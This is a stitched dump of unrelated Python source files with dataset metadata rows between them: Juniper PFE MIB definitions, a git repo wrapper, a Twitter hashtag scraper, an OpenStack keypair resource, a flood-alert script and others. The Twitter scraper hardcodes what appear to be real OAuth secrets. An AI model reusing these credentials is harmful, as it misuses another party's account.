jnxPfeNextHopMemoryThresholdAbated = NotificationType((1, 3, 6, 1, 4, 1, 2636, 3, 44, 1, 2, 4, 0, 4)).setObjects(("JUNIPER-PFE-MIB", "jnxPfeGlSlot"), ("JUNIPER-PFE-MIB", "jnxPfeInstanceNumber"), ("JUNIPER-PFE-MIB", "jnxPfeMemoryThreshold"))
if mibBuilder.loadTexts: jnxPfeNextHopMemoryThresholdAbated.setStatus('current')
if mibBuilder.loadTexts: jnxPfeNextHopMemoryThresholdAbated.setDescription('Indicates that the Next Hop Memory utilization has fallen below the configured watermark.')
jnxPfeFilterMemoryThresholdExceeded = NotificationType((1, 3, 6, 1, 4, 1, 2636, 3, 44, 1, 2, 4, 0, 5)).setObjects(("JUNIPER-PFE-MIB", "jnxPfeGlSlot"), ("JUNIPER-PFE-MIB", "jnxPfeInstanceNumber"), ("JUNIPER-PFE-MIB", "jnxPfeMemoryThreshold"))
if mibBuilder.loadTexts: jnxPfeFilterMemoryThresholdExceeded.setStatus('current')
if mibBuilder.loadTexts: jnxPfeFilterMemoryThresholdExceeded.setDescription('Indicates that the Filter Memory utilization has crossed the configured watermark.')
jnxPfeFilterMemoryThresholdAbated = NotificationType((1, 3, 6, 1, 4, 1, 2636, 3, 44, 1, 2, 4, 0, 6)).setObjects(("JUNIPER-PFE-MIB", "jnxPfeGlSlot"), ("JUNIPER-PFE-MIB", "jnxPfeInstanceNumber"), ("JUNIPER-PFE-MIB", "jnxPfeMemoryThreshold"))
if mibBuilder.loadTexts: jnxPfeFilterMemoryThresholdAbated.setStatus('current')
if mibBuilder.loadTexts: jnxPfeFilterMemoryThresholdAbated.setDescription('Indicates that the Filter Memory utilization has fallen below the configured watermark.')
jnxPfeEncapMemoryThresholdExceeded = NotificationType((1, 3, 6, 1, 4, 1, 2636, 3, 44, 1, 2, 4, 0, 7)).setObjects(("JUNIPER-PFE-MIB", "jnxPfeGlSlot"), ("JUNIPER-PFE-MIB", "jnxPfeInstanceNumber"), ("JUNIPER-PFE-MIB", "jnxPfeMemoryThreshold"))
if mibBuilder.loadTexts: jnxPfeEncapMemoryThresholdExceeded.setStatus('current')
if mibBuilder.loadTexts: jnxPfeEncapMemoryThresholdExceeded.setDescription('Indicates that the ENCAP Memory utilization has crossed the configured watermark.')
jnxPfeEncapMemoryThresholdAbated = NotificationType((1, 3, 6, 1, 4, 1, 2636, 3, 44, 1, 2, 4, 0, 8)).setObjects(("JUNIPER-PFE-MIB", "jnxPfeGlSlot"), ("JUNIPER-PFE-MIB", "jnxPfeInstanceNumber"), ("JUNIPER-PFE-MIB", "jnxPfeMemoryThreshold"))
if mibBuilder.loadTexts: jnxPfeEncapMemoryThresholdAbated.setStatus('current')
if mibBuilder.loadTexts: jnxPfeEncapMemoryThresholdAbated.setDescription('Indicates that the ENCAP Memory utilization has fallen below the configured watermark.')
mibBuilder.exportSymbols("JUNIPER-PFE-MIB", jnxPfeNotifyTypeTable=jnxPfeNotifyTypeTable, jnxPfeNotifyGlTtlExcErrors=jnxPfeNotifyGlTtlExcErrors, jnxPfeFpcSlot=jnxPfeFpcSlot, jnxPfeNotifyTypeEntry=jnxPfeNotifyTypeEntry, jnxPfeMemoryUkernFreePercent=jnxPfeMemoryUkernFreePercent, jnxPfeEncapMemoryThresholdExceeded=jnxPfeEncapMemoryThresholdExceeded, jnxPfeMemoryNotifications=jnxPfeMemoryNotifications, jnxPfeNotifyGlSlot=jnxPfeNotifyGlSlot, jnxPfeNotifyTypeIgnored=jnxPfeNotifyTypeIgnored, jnxPfeMemoryForwardingEntry=jnxPfeMemoryForwardingEntry, jnxPfeSlot=jnxPfeSlot, jnxPfeMemoryType=jnxPfeMemoryType, jnxPfeMib=jnxPfeMib, jnxPfeNotifyGlOptTtlExp=jnxPfeNotifyGlOptTtlExp, jnxPfeMemoryUkernTable=jnxPfeMemoryUkernTable, PYSNMP_MODULE_ID=jnxPfeMib, jnxPfeNotifyGlAged=jnxPfeNotifyGlAged, pfeMemoryErrors=pfeMemoryErrors, jnxPfeMemoryTrapVars=jnxPfeMemoryTrapVars, jnxPfeNotifyTypeDescr=jnxPfeNotifyTypeDescr, jnxPfeMemoryErrorsEntry=jnxPfeMemoryErrorsEntry, jnxPfeFilterMemoryThresholdExceeded=jnxPfeFilterMemoryThresholdExceeded, jnxPfeNotifyGlCorrupt=jnxPfeNotifyGlCorrupt, jnxPfeNextHopMemoryThresholdAbated=jnxPfeNextHopMemoryThresholdAbated, jnxPfeNotifyGlPktGetFails=jnxPfeNotifyGlPktGetFails, jnxPfeNotifyGlGiants=jnxPfeNotifyGlGiants, jnxPfeNotifyGlDiscSample=jnxPfeNotifyGlDiscSample, jnxPfeNotifyTypeParsed=jnxPfeNotifyTypeParsed, jnxPfeMemoryForwardingChipSlot=jnxPfeMemoryForwardingChipSlot, jnxPfeHeapMemoryThresholdExceeded=jnxPfeHeapMemoryThresholdExceeded, jnxPfeMemoryNotificationsPrefix=jnxPfeMemoryNotificationsPrefix, jnxPfeEccErrors=jnxPfeEccErrors, jnxPfeNotifyTypeFailed=jnxPfeNotifyTypeFailed, jnxPfeMemoryErrorsTable=jnxPfeMemoryErrorsTable, jnxPfeNotifyGlUnknowns=jnxPfeNotifyGlUnknowns, jnxPfeNotifyGlSvcOptAsp=jnxPfeNotifyGlSvcOptAsp, JnxPfeMemoryTypeEnum=JnxPfeMemoryTypeEnum, jnxPfeNextHopMemoryThresholdExceeded=jnxPfeNextHopMemoryThresholdExceeded, jnxPfeNotifyGlDmaFails=jnxPfeNotifyGlDmaFails, jnxPfeGlSlot=jnxPfeGlSlot, 
jnxPfeHeapMemoryThresholdAbated=jnxPfeHeapMemoryThresholdAbated, jnxPfeNotification=jnxPfeNotification, jnxPfeNotifyGlTable=jnxPfeNotifyGlTable, jnxPfeNotifyGlParAccSec=jnxPfeNotifyGlParAccSec, jnxPfeFilterMemoryThresholdAbated=jnxPfeFilterMemoryThresholdAbated, jnxPfeParityErrors=jnxPfeParityErrors, jnxPfeNotifyGlSvcOptRe=jnxPfeNotifyGlSvcOptRe, jnxPfeMemoryForwardingTable=jnxPfeMemoryForwardingTable, jnxPfeNotifyGlSample=jnxPfeNotifyGlSample, jnxPfeNotifyGlParsed=jnxPfeNotifyGlParsed, jnxPfeNotifyGlIllegal=jnxPfeNotifyGlIllegal, jnxPfeMemoryForwardingPercentFree=jnxPfeMemoryForwardingPercentFree, jnxPfeEncapMemoryThresholdAbated=jnxPfeEncapMemoryThresholdAbated, jnxPfeNotifyTypeInput=jnxPfeNotifyTypeInput, jnxPfeNotifyGlEntry=jnxPfeNotifyGlEntry, jnxPfeNotifyGlDmaTotals=jnxPfeNotifyGlDmaTotals, jnxPfeMemoryUkernEntry=jnxPfeMemoryUkernEntry, jnxPfeNotifyGlTtlExceeded=jnxPfeNotifyGlTtlExceeded, jnxPfeNotifyGlRateLimited=jnxPfeNotifyGlRateLimited, jnxPfeInstanceNumber=jnxPfeInstanceNumber, jnxPfeMemoryThreshold=jnxPfeMemoryThreshold, jnxPfeNotifyGlPostSvcOptOut=jnxPfeNotifyGlPostSvcOptOut, pfeMemoryErrorsNotificationPrefix=pfeMemoryErrorsNotificationPrefix, jnxPfeNotifyTypeId=jnxPfeNotifyTypeId, jnxPfeMemory=jnxPfeMemory)
| 138.550725 | 3,195 | 0.792329 | 3,270 | 28,680 | 6.948624 | 0.137003 | 0.062847 | 0.109982 | 0.011091 | 0.449784 | 0.322287 | 0.256183 | 0.236775 | 0.19655 | 0.179342 | 0 | 0.056271 | 0.090377 | 28,680 | 206 | 3,196 | 139.223301 | 0.814704 | 0.011297 | 0 | 0 | 0 | 0.050761 | 0.295799 | 0.011077 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.035533 | 0 | 0.060914 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
f78d723f4ed254f9db1cfbb4a3d36e1a79d103f2 | 2,871 | py | Python | container_builder/src/repos.py | bandit145/container-builder | d5954e6517dfd8ce8050466bf7099879a84e24a8 | [
"MIT"
] | 1 | 2021-03-31T18:04:39.000Z | 2021-03-31T18:04:39.000Z | container_builder/src/repos.py | bandit145/container-builder | d5954e6517dfd8ce8050466bf7099879a84e24a8 | [
"MIT"
] | null | null | null | container_builder/src/repos.py | bandit145/container-builder | d5954e6517dfd8ce8050466bf7099879a84e24a8 | [
"MIT"
] | null | null | null | from abc import ABC, abstractmethod
import subprocess
import os
from container_builder.src.exceptions import RepoException
class Repo(ABC):
    repo_url = None
    release = None
    repo_dir = None
    name = None

    def __init__(self, repo_url, repo_dir, name):
        self.repo_url = repo_url
        self.name = name
        self.repo_dir = repo_dir
        self.path = f"{self.repo_dir}/{self.name}"

    @abstractmethod
    def update(self):
        pass

    @abstractmethod
    def configure(self):
        pass

    @abstractmethod
    def cleanup(self):
        pass


class NoRepo(Repo):
    def __init__(self, repo_dir, **kwargs):
        super().__init__(None, None, None)

    def update(self):
        pass

    def configure(self):
        pass

    def cleanup(self):
        pass


class TestRepo(Repo):
    def __init__(self, repo_dir, **kwargs):
        super().__init__(kwargs["url"], repo_dir, kwargs["name"])

    def update(self):
        pass

    def configure(self):
        pass

    def cleanup(self):
        pass


class Git(Repo):
    def __init__(self, repo_dir, **kwargs):
        if "name" not in kwargs.keys():
            name = kwargs["url"].split("/")[-1].split(".")[0]
        super().__init__(kwargs["url"], repo_dir, name)

    def update(self):
        if os.path.exists(f"{self.repo_dir}/{self.name}"):
            output = subprocess.run(
                "git fetch --all --tags",
                shell=True,
                stdout=subprocess.PIPE,
                stderr=subprocess.STDOUT,
                cwd=f"{self.repo_dir}/{self.name}",
            )
        else:
            output = subprocess.run(
                f"git clone {self.repo_url} {self.name}",
                shell=True,
                stdout=subprocess.PIPE,
                stderr=subprocess.STDOUT,
                cwd=self.repo_dir,
            )
        if output.returncode != 0:
            raise RepoException(output.stdout)

    def set_branch(self, branch):
        # not used for anything yet but it should be used to reset to a working branch
        # current_branch = str(
        #     subprocess.run(
        #         f"git branch --show-current",
        #         shell=True,
        #         stdout=subprocess.PIPE,
        #         stderr=subprocess.STDOUT,
        #         cwd=f"{self.repo_dir}/{self.name}",
        #         check=True,
        #     ).stdout
        # ).strip("\n")
        output = subprocess.run(
            f"git checkout {branch}",
            shell=True,
            stdout=subprocess.PIPE,
            stderr=subprocess.STDOUT,
            cwd=f"{self.repo_dir}/{self.name}",
        )
        if output.returncode != 0:
            raise RepoException(output.stdout)

    def cleanup(self):
        pass

    def configure(self, branch):
        self.update()
        self.set_branch(branch)
| 24.965217 | 86 | 0.538837 | 319 | 2,871 | 4.68652 | 0.238245 | 0.070234 | 0.073579 | 0.040134 | 0.519064 | 0.456856 | 0.402676 | 0.383946 | 0.383946 | 0.228763 | 0 | 0.002124 | 0.344131 | 2,871 | 114 | 87 | 25.184211 | 0.791822 | 0.115987 | 0 | 0.5625 | 0 | 0 | 0.081948 | 0.042755 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2125 | false | 0.125 | 0.05 | 0 | 0.3625 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
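The clone-or-fetch branch inside `Git.update` can be sketched in isolation. This is a minimal, side-effect-free restatement of that logic (the function name and paths here are illustrative, not part of the original module): it returns the git command and working directory that `subprocess.run` would receive, without actually shelling out.

```python
import os

def git_update_command(repo_dir, name, url):
    """Mirror of Git.update's branching: fetch inside an existing
    checkout, otherwise clone the URL into repo_dir."""
    path = os.path.join(repo_dir, name)
    if os.path.exists(path):
        # Existing checkout: refresh all remotes and tags in place.
        return ("git fetch --all --tags", path)
    # No checkout yet: clone into the parent directory.
    return (f"git clone {url} {name}", repo_dir)
```

Separating command construction from execution like this makes the branch easy to unit-test without touching the filesystem or a real remote.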
f79cc4c44977baae5aece467257b0049dda58c23 | 212 | py | Python | src/python/create_view/other/implement_each.py | Cogmob/tag | b90429bd8fd731489a22e5b65aea63e43ba064b2 | [
"Apache-2.0"
] | null | null | null | src/python/create_view/other/implement_each.py | Cogmob/tag | b90429bd8fd731489a22e5b65aea63e43ba064b2 | [
"Apache-2.0"
] | null | null | null | src/python/create_view/other/implement_each.py | Cogmob/tag | b90429bd8fd731489a22e5b65aea63e43ba064b2 | [
"Apache-2.0"
] | null | null | null | def implement_each(folder, each):
folder['tags'] = each['tags'] + folder['tags']
for key, tags in each['folders'].items():
folder['folders'][key] = {'tags': tags, 'folders': {}}
return folder
| 35.333333 | 62 | 0.59434 | 26 | 212 | 4.807692 | 0.423077 | 0.16 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.193396 | 212 | 5 | 63 | 42.4 | 0.730994 | 0 | 0 | 0 | 0 | 0 | 0.174528 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0 | 0 | 0.4 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
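A quick demonstration of what `implement_each` does to its inputs (the tag values below are made up for illustration): tags from `each` are prepended to the folder's own tags, and each entry in `each['folders']` becomes a fresh child node with an empty `folders` dict.

```python
def implement_each(folder, each):
    # Identical to the function above.
    folder['tags'] = each['tags'] + folder['tags']
    for key, tags in each['folders'].items():
        folder['folders'][key] = {'tags': tags, 'folders': {}}
    return folder

folder = {'tags': ['local'], 'folders': {}}
each = {'tags': ['shared'], 'folders': {'docs': ['readme']}}
result = implement_each(folder, each)
# result['tags'] == ['shared', 'local']
# result['folders']['docs'] == {'tags': ['readme'], 'folders': {}}
```

Note that the function mutates `folder` in place and returns the same object, so callers holding a reference to the original dict will see the changes.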
e39ebdc561af3d06d359c73e39cf8392e83c7f27 | 2,607 | py | Python | social_media/twitter_get.py | TejasM/socialmedia | 84764b8f17c73b4991af4f711a27e11b9d95c264 | [
"MIT"
] | null | null | null | social_media/twitter_get.py | TejasM/socialmedia | 84764b8f17c73b4991af4f711a27e11b9d95c264 | [
"MIT"
] | null | null | null | social_media/twitter_get.py | TejasM/socialmedia | 84764b8f17c73b4991af4f711a27e11b9d95c264 | [
"MIT"
] | null | null | null | import datetime
import time
from email.utils import parsedate
from twitter import *
__author__ = 'tmehta'
# create a Twitter client object with our secret tokens
t = Twitter(auth=OAuth('1363462640-Bwrpds3AK7UeCqEmvkrABfKdGfqzgl9pO3hJ1mk',
'7SFgvvflEchJxgyePZwiwQV6CYC7H7joVbSh8bjZM', 'phYQOWa0275clxNNPRz0rw',
'0vvkv6vGm2G9o1tLMtyn7KzObcmKEaMmK2MeAz3DdSw'))
def get_by_hash_tag(hash_tag, since_inner=datetime.datetime.today()):
q = hash_tag
oldest_id = TwitterEvent.objects.order_by('tweet_id')[0].tweet_id
for twe in t.search.tweets(q=q, count=1000, since_id=oldest_id, result_type='recent')[
'statuses']:
# GET OR CREATE FOLLOWER
try:
TwitterEvent.objects.get(tweet_id=twe['id'])
except TwitterEvent.DoesNotExist:
try:
follower = TwitterFollower.objects.get(twitter_id=twe['user']['id'])
except TwitterFollower.DoesNotExist:
print("Creating follower")
follower = TwitterFollower.objects.create(twitter_id=twe['user']['id'],
followers_count=twe['user']['followers_count'],
description=twe['user']['description'],
friends_count=twe['user']['friends_count'],
handle=twe['user']['screen_name'],
timezone=twe['user']['time_zone'])
# TODO: Update follower
# Create Tweet
date = datetime.datetime.fromtimestamp(time.mktime(parsedate(twe['created_at'])))
tw = TwitterEvent.objects.create(text=twe['text'], tweeted_at=date,
event_occurrence=date,
tweet_id=twe['id'], by=follower)
# TODO: Multiple Hash tags
tw.hash_tags = [HashTag.objects.get(tag_name=hash_tag).id]
tw.save()
if __name__ == "__main__":
since = datetime.datetime.today()
since = since - datetime.timedelta(days=1)
for tweet in t.search.tweets(q='lvg', count=1, since=since.strftime('%Y-%m-%d'))['statuses']:
# GET OR CREATE FOLLOWER
print(tweet)
else:
from dashboard.models import TwitterFollower, HashTag
from dashboard.models import TwitterEvent
for tag in HashTag.objects.all():
print(tag.tag_name)
get_by_hash_tag(tag.tag_name) | 45.736842 | 105 | 0.572305 | 262 | 2,607 | 5.519084 | 0.396947 | 0.033887 | 0.012448 | 0.016598 | 0.084371 | 0 | 0 | 0 | 0 | 0 | 0 | 0.022714 | 0.324511 | 2,607 | 57 | 106 | 45.736842 | 0.79841 | 0.067894 | 0 | 0.046512 | 0 | 0 | 0.139026 | 0.064356 | 0 | 0 | 0 | 0.017544 | 0 | 0 | null | null | 0 | 0.139535 | null | null | 0.069767 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
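The date handling in the script above is worth isolating: Twitter's `created_at` strings (e.g. `'Wed Aug 29 17:12:58 +0000 2012'`) are RFC 2822-style dates that `email.utils.parsedate` can parse. A small sketch of the same conversion chain the script uses:

```python
import datetime
import time
from email.utils import parsedate

def parse_created_at(created_at):
    # Same chain as twitter_get.py: parsedate -> struct_time,
    # mktime -> epoch seconds, fromtimestamp -> datetime.
    # Note: parsedate discards the +0000 offset, and the
    # mktime/fromtimestamp round trip preserves the wall-clock
    # fields, so the naive components pass through unchanged.
    return datetime.datetime.fromtimestamp(
        time.mktime(parsedate(created_at)))
```

If timezone correctness matters, `email.utils.parsedate_to_datetime` (Python 3.3+) would keep the offset instead of silently dropping it.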
e39f3a209febcc055e07455d8891a812ce7bc63e | 417 | py | Python | hazard_detection/water_detection_functions.py | Vlad-Mocanu/hazard_detection | 6c3426847e90846347b7eb0f538b2c0854093b14 | [
"Apache-2.0"
] | 1 | 2018-03-10T11:02:25.000Z | 2018-03-10T11:02:25.000Z | hazard_detection/water_detection_functions.py | Vlad-Mocanu/hazard_detection | 6c3426847e90846347b7eb0f538b2c0854093b14 | [
"Apache-2.0"
] | null | null | null | hazard_detection/water_detection_functions.py | Vlad-Mocanu/hazard_detection | 6c3426847e90846347b7eb0f538b2c0854093b14 | [
"Apache-2.0"
] | null | null | null | import smtplib
import time
import datetime
import mail_functions
def get_flood_status(pin_value, email_subject_prefix, logging, config_options):
now = "[%s] " % datetime.datetime.now()
if pin_value:
mail_functions.sendEmail(email_subject_prefix + "Everything OK", logging, config_options)
else:
mail_functions.sendEmail(email_subject_prefix + "WATER DETECTED", logging, config_options)
| 29.785714 | 98 | 0.760192 | 52 | 417 | 5.788462 | 0.519231 | 0.129568 | 0.179402 | 0.179402 | 0.265781 | 0.265781 | 0 | 0 | 0 | 0 | 0 | 0 | 0.155875 | 417 | 13 | 99 | 32.076923 | 0.855114 | 0 | 0 | 0 | 0 | 0 | 0.076739 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1 | false | 0 | 0.4 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
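The branch in `get_flood_status` couples message selection to the email side effect. A small refactoring sketch (the function name here is hypothetical) factors the message choice out so it can be tested without a mail server:

```python
def flood_message(pin_value):
    # Same branch logic as get_flood_status above, minus the
    # mail_functions.sendEmail side effect: a truthy pin reads
    # as dry, a falsy pin as water detected.
    return "Everything OK" if pin_value else "WATER DETECTED"
```

`get_flood_status` could then build its subject as `email_subject_prefix + flood_message(pin_value)` and keep the sending in one place.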
e3a1eab2cc7862ddfcb20912649792e66d449c7a | 3,565 | py | Python | openstack/compute/v2/keypair.py | horion/openstacksdk | cbb0e12e1dc944847f2ba0e67bf35b9c7a67b3a3 | [
"Apache-2.0"
] | 99 | 2018-03-28T15:41:45.000Z | 2022-01-23T17:22:13.000Z | openstack/compute/v2/keypair.py | horion/openstacksdk | cbb0e12e1dc944847f2ba0e67bf35b9c7a67b3a3 | [
"Apache-2.0"
] | 5 | 2018-05-25T16:54:23.000Z | 2021-11-21T02:27:16.000Z | openstack/compute/v2/keypair.py | horion/openstacksdk | cbb0e12e1dc944847f2ba0e67bf35b9c7a67b3a3 | [
"Apache-2.0"
] | 104 | 2018-04-06T14:33:54.000Z | 2022-03-01T01:58:09.000Z | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from openstack import resource
class Keypair(resource.Resource):
resource_key = 'keypair'
resources_key = 'keypairs'
base_path = '/os-keypairs'
_query_mapping = resource.QueryParameters(
'user_id')
# capabilities
allow_create = True
allow_fetch = True
allow_delete = True
allow_list = True
_max_microversion = '2.10'
# Properties
#: The date and time when the resource was created.
created_at = resource.Body('created_at')
#: A boolean indicates whether this keypair is deleted or not.
is_deleted = resource.Body('deleted', type=bool)
#: The short fingerprint associated with the ``public_key`` for
#: this keypair.
fingerprint = resource.Body('fingerprint')
# NOTE: There is in fact an 'id' field. However, it's not useful
# because all operations use the 'name' as an identifier.
# Additionally, the 'id' field only appears *after* creation,
# so suddenly you have an 'id' field filled in after the fact,
# and it just gets in the way. We need to cover this up by listing
# name as alternate_id and listing id as coming from name.
#: The id identifying the keypair
id = resource.Body('name')
#: A name identifying the keypair
name = resource.Body('name', alternate_id=True)
#: The private key for the keypair
private_key = resource.Body('private_key')
#: The SSH public key that is paired with the server.
public_key = resource.Body('public_key')
#: The type of the keypair.
type = resource.Body('type', default='ssh')
#: The user_id for a keypair.
user_id = resource.Body('user_id')
def _consume_attrs(self, mapping, attrs):
# TODO(mordred) This should not be required. However, without doing
# it **SOMETIMES** keypair picks up id and not name. This is a hammer.
if 'id' in attrs:
attrs.setdefault('name', attrs.pop('id'))
return super(Keypair, self)._consume_attrs(mapping, attrs)
@classmethod
def existing(cls, connection=None, **kwargs):
"""Create an instance of an existing remote resource.
When creating the instance set the ``_synchronized`` parameter
of :class:`Resource` to ``True`` to indicate that it represents the
state of an existing server-side resource. As such, all attributes
passed in ``**kwargs`` are considered "clean", such that an immediate
:meth:`update` call would not generate a body of attributes to be
modified on the server.
:param dict kwargs: Each of the named arguments will be set as
attributes on the resulting Resource object.
"""
# Listing KPs return list with resource_key structure. Instead of
# overriding whole list just try to create object smart.
if cls.resource_key in kwargs:
args = kwargs.pop(cls.resource_key)
kwargs.update(**args)
return cls(_synchronized=True, connection=connection, **kwargs)
| 41.453488 | 78 | 0.682188 | 492 | 3,565 | 4.873984 | 0.414634 | 0.045038 | 0.010842 | 0.013344 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.002568 | 0.235344 | 3,565 | 85 | 79 | 41.941176 | 0.877109 | 0.587097 | 0 | 0 | 0 | 0 | 0.085966 | 0 | 0 | 0 | 0 | 0.011765 | 0 | 1 | 0.064516 | false | 0 | 0.032258 | 0 | 0.774194 | 0.032258 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
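The tail of `Keypair.existing` handles a quirk the comment mentions: listing keypairs returns each payload wrapped under the resource key (`{'keypair': {...}}`). A standalone sketch of that unwrapping step (the helper name is illustrative, not part of the SDK):

```python
def unwrap_resource(resource_key, payload):
    # Mirrors Keypair.existing: if the payload is wrapped under the
    # resource key, flatten it before constructing the object.
    if resource_key in payload:
        payload = dict(payload)  # avoid mutating the caller's dict
        payload.update(payload.pop(resource_key))
    return payload

# {'keypair': {'name': 'kp1'}}  ->  {'name': 'kp1'}
# {'name': 'kp2'}               ->  {'name': 'kp2'}  (already flat)
```

Unlike the original, this copy-then-pop variant leaves the caller's dict untouched, which is usually the safer default for a helper like this.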
e3a25f6b362be856865b8ee973cf2e6573257e88 | 313 | py | Python | waynerv_test/cli.py | mpflynnx/waynerv-test | 5572800926f1a2bf36aa6f145cab0c3b5cb647fe | [
"MIT"
] | null | null | null | waynerv_test/cli.py | mpflynnx/waynerv-test | 5572800926f1a2bf36aa6f145cab0c3b5cb647fe | [
"MIT"
] | null | null | null | waynerv_test/cli.py | mpflynnx/waynerv-test | 5572800926f1a2bf36aa6f145cab0c3b5cb647fe | [
"MIT"
] | null | null | null | """Console script for waynerv_test."""
import click
@click.command()
def main():
"""Main entrypoint."""
click.echo("waynerv-test")
click.echo("=" * len("waynerv-test"))
click.echo("Skeleton project created by Cookiecutter PyPackage")
if __name__ == "__main__":
main() # pragma: no cover
| 19.5625 | 68 | 0.651757 | 37 | 313 | 5.27027 | 0.648649 | 0.169231 | 0.164103 | 0.205128 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.178914 | 313 | 15 | 69 | 20.866667 | 0.758755 | 0.214058 | 0 | 0 | 0 | 0 | 0.353191 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | true | 0 | 0.125 | 0 | 0.25 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
e3a9e1f677c3a2c19194e76c637555f3898199d3 | 2,298 | py | Python | run_awera_eval_2.py | lthUniBonn/AWERA | fa7f210516318bcfcbe1c99abbb5954b0cbaf682 | [
"MIT"
] | null | null | null | run_awera_eval_2.py | lthUniBonn/AWERA | fa7f210516318bcfcbe1c99abbb5954b0cbaf682 | [
"MIT"
] | null | null | null | run_awera_eval_2.py | lthUniBonn/AWERA | fa7f210516318bcfcbe1c99abbb5954b0cbaf682 | [
"MIT"
] | null | null | null | import os
from AWERA import config, ChainAWERA
import numpy as np
# TODO make clear how each module runs with the input of the previous
# power_model.load() .generate() how is the object made/passed
if __name__ == '__main__':
# read config from jobnumber
# 8 small jobs
# 4 big jobs
loc_id = int(os.environ['LOC_ID'])
settings = {
'Processing': {'n_cores': 2}, # 10
'Data': {'n_locs': -1,
'location_type': 'europe'},
'Clustering': {
'n_clusters': 8, # TODO choose before predict labels...
'training': {
'n_locs': 5000,
'location_type': 'europe'
}
},
'IO': {'result_dir':
"/cephfs/user/s6lathim/AWERA_results/"}
}
print(settings)
# Update settings to config
config.update(settings)
working_title = 'eval_locs_{}'.format(loc_id) # 'run_profile'
from AWERA.eval.evaluation import evalAWERA
e = evalAWERA(config)
# working_title = 'sliding_window_eval'
# e.sliding_window_power(time_window=24, # Hours for hourly data
# at_night=False, # True,
# power_lower_bar=None,
# power_lower_perc=15,
# read_if_possible=True,
# locs_slice=None, # (loc_id, 1000)) # ,
# read_from_slices=(23, 1000)) #
e.aep_map()
# print('Map plotted.')
# e.power_freq()
# profiler.disable()
# # # Write profiler output
# file_name = (
# config.IO.result_dir
# + config.IO.format.plot_output.format(
# data_info=config.Data.data_info,
# data_info_training=config.Clustering.training.data_info,
# settings_info=config.Clustering.training.settings_info)
# .replace('.pdf', '{}.profile'.format(loc_id))
# )
# with open(file_name.format(title='run_profile'), 'w') as f:
# stats = pstats.Stats(profiler, stream=f)
# stats.strip_dirs()
# stats.sort_stats('cumtime')
# stats.print_stats('py:', .1)
# print('Profile output written to: ',
# file_name.format(title=working_title))
#plt.show()
| 32.828571 | 76 | 0.551349 | 256 | 2,298 | 4.710938 | 0.507813 | 0.02073 | 0.029851 | 0.031509 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.017408 | 0.325065 | 2,298 | 69 | 77 | 33.304348 | 0.760155 | 0.586597 | 0 | 0 | 1 | 0 | 0.191372 | 0.039823 | 0 | 0 | 0 | 0.014493 | 0 | 1 | 0 | false | 0 | 0.16 | 0 | 0.16 | 0.04 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
e3b01797310c7cd2b410621f4337021dedac5ae9 | 42,499 | py | Python | release/stubs/System/ComponentModel/Design/Serialization.py | YKato521/ironpython-stubs | b1f7c580de48528490b3ee5791b04898be95a9ae | [
"MIT"
] | null | null | null | release/stubs/System/ComponentModel/Design/Serialization.py | YKato521/ironpython-stubs | b1f7c580de48528490b3ee5791b04898be95a9ae | [
